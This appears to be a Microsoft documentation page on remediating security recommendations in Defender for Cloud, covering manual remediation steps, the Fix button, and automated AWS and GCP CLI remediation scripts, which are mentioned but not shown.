Edit

Share via

Remediate recommendations in Microsoft Defender for Cloud

When you use Microsoft Defender for Cloud to help protect your resources and workloads, they're assessed against built-in and custom security standards enabled in your Azure subscriptions, Amazon Web Services (AWS) accounts, and Google Cloud Platform (GCP) projects. Based on those assessments, security recommendations provide practical steps to remediate security issues and improve security posture.

This article describes how to remediate security recommendations in your Defender for Cloud deployment.

Before you attempt to remediate a recommendation, you should review it in detail. Learn how to review security recommendations.

Remediate a recommendation

By default, recommendations are prioritized based on the risk level of the security issue.

In addition to risk level, we recommend that you prioritize the security controls in the default Microsoft cloud security benchmark standard in Defender for Cloud. These controls affect your Microsoft Secure Score.

  1. Sign in to the Azure portal.

  2. Go to Microsoft Defender for Cloud > Recommendations.

    Screenshot of the recommendations page that shows all the affected resources by their risk level.

  3. Select a recommendation.

  4. Select Take action.

  5. Locate the Remediate section and follow the remediation instructions.

    Screenshot that shows manual remediation steps for a recommendation.

Use the Fix option

To simplify the remediation process, a button labeled Fix might appear in a recommendation. The Fix button helps you quickly remediate a recommendation on multiple resources. If there isn't a Fix button in the recommendation, then you can't apply a quick fix, so you must follow the presented remediation steps to address the recommendation.

  1. Sign in to the Azure portal.

  2. Go to Microsoft Defender for Cloud > Recommendations.

  3. Select a recommendation to remediate.

  4. Select Take action > Fix.

    Screenshot that shows recommendations with the Fix action.

  5. Follow the rest of the remediation steps.

After remediation finishes, it can take several minutes for the change to take place.

Use automated remediation scripts

Security admins can also fix issues at scale with automatic script generation in AWS and GCP CLI script language. When you select Take action > Fix on a recommendation where an automated script is available, the following window opens.

Screenshot that shows recommendations with the automated remediation script.

To remediate the recommendation, copy and run the script.

Related content